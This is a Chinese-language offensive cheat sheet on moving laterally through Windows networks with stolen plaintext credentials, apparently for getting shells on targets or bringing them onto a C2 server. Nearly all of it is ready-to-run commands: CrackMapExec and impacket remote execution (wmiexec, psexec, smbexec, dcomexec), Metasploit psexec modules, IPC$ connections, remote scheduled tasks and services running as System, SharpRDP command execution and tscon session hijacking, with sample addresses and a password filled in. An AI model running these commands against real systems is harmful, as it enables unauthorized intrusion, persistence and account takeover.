说明
一些情况下如拿到密码本了,但我们仍然需要上到服务器上去翻东西,或者让其上线到C2,直接RDP上又不太好,所以这里就总结一些常见的方法吧。(大多数情况下直接上线到C2是最简单的方式。
exec类
和PTH类似,只不过PTH里面用的是hash,这里用的是明文账号密码。
cme:
cme smb 172.16.93.3 -u administrator -p KsadiN8A.as221 -d org.gm7 -x whoami
cme winrm 172.16.93.3 -u administrator -p KsadiN8A.as221 -d org.gm7 -x whoami
impacket:
python3 examples/wmiexec.py org/administrator:[email protected] whoami
python3 examples/wmiexec.py org/administrator:[email protected] # 不输入命令默认返回一个shell
python3 examples/psexec.py org/administrator:[email protected] whoami
python3 examples/psexec.py org/administrator:[email protected] # 不输入命令默认返回一个shell
python3 examples/smbexec.py org/administrator:[email protected]
python3 examples/dcomexec.py org/administrator:[email protected] whoami
python3 examples/dcomexec.py org/administrator:[email protected] # 不输入命令默认返回一个shell
msf:
use auxiliary/scanner/smb/impacket/wmiexec
set COMMAND whoami
set RHOSTS 172.16.93.3
set SMBPass KsadiN8A.as221
set SMBUSER administrator
run
use exploit/windows/smb/psexec
计划任务和服务
建立IPC连接
net use \\172.16.93.3\ipc$ "KsadiN8A.as221" /user:"Administrator"
# net use # 查看连接列表
# net use * /del # 删除所有IPC连接
查看目标服务器时间
net time \\172.16.93.3
创建计划任务
# 低版本windows
at \\172.16.93.3 15:37 cmd.exe /c "whoami > c:\result.txt"
# 高版本windows
schtasks /Create /S 172.16.93.3 /TN Test /SC minute /MO 1 /TR calc.exe /RU System /F
创建服务
sc \\172.16.93.3 create Test binpath= "cmd.exe /k calc.exe" # binpath的等号后面需要有一个空格
sc start Test # 启动服务
sc stop Test # 删除服务
sc delete Test # 删除服务
RDP
SharpRDP
开启远程桌面的情况下,可以通过远程桌面协议(RDP)在远程主机上执行系统命令,且不需要GUI客户端,使用工具 SharpRDP
注:使用 SharpRDP 成功执行命令后,目标机会出现锁屏状态
SharpRDP.exe computername=172.16.93.3 username=administrator password="KsadiN8A.as221" command="calc.exe"
tscon 劫持
可以通过query user来列出所有登录的用户列表,得到id
在SYSTEM权限下,使用 tscon <ID>
来切换用户不需要验证密码。
没成功过